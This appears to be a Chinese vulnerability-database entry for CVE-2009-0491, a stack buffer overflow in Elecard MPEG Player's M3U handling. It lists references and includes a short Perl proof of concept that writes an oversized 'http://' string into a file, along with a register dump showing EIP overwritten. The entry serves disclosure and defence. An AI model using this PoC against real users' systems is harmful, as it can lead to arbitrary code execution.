Elecard MPEG Player M3U文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117180 漏洞类型 缓冲区溢出
发布时间 2009-01-01 更新时间 2009-02-19
CVE编号 CVE-2009-0491 CNNVD-ID CNNVD-200902-238
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7637
https://www.securityfocus.com/bid/33089
https://cxsecurity.com/issue/WLB-2009020149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-238
|漏洞详情
ElecardMPEGPlayer是俄罗斯Elecard公司的一款流行的视频播放器。如果用户受骗使用ElecardMPEGPlayer打开了畸形的M3U文件的话,就可以触发栈溢出,导致执行任意指令。
|漏洞EXP
#!/usr/bin/perl -w

########################################################################
#Program  : Elecard MPEG Player                                       
#Version  : 5.5 build 15884.081218                                    
#website  : http://www.elecard.com/download/index.php                   
#Download : http://www.elecard.com/ftp/pub/mpeg/player/EMpgPlayer.zip 
#Type     :  * (.M3U) Buffer Overflow POC                             
########################################################################

#EAX 00000000
#ECX 41414141
#EDX 7C9037D8 ntdll.7C9037D8
#EBX 00000000
#ESP 0012BE40
#EBP 0012BE60
#ESI 00000000
#EDI 00000000
#EIP 41414141
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0
#EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
#MM0 0020 0202 0000 001B
#MM1 015A F2BC 8986 2BC0
#MM2 011C 0000 4020 027F
#MM3 0000 0000 804D A735
#MM4 BADB 0D00 BF83 15E6
#MM5 8A1B EAB8 0000 0005
#MM6 0000 0000 0000 0000
#MM7 D1B7 1758 E219 6000




my $file="boom.m3u";


open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A" x 72850;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-01]
|受影响的产品
Elecard MPEG Player 5.5 Elecard AVC HD Player 0
|参考资料

来源:MILW0RM
名称:7637
链接:http://www.milw0rm.com/exploits/7637
来源:VUPEN
名称:ADV-2009-0007
链接:http://www.frsirt.com/english/advisories/2009/0007
来源:SECUNIA
名称:33355
链接:http://secunia.com/advisories/33355
来源:OSVDB
名称:51075
链接:http://osvdb.org/51075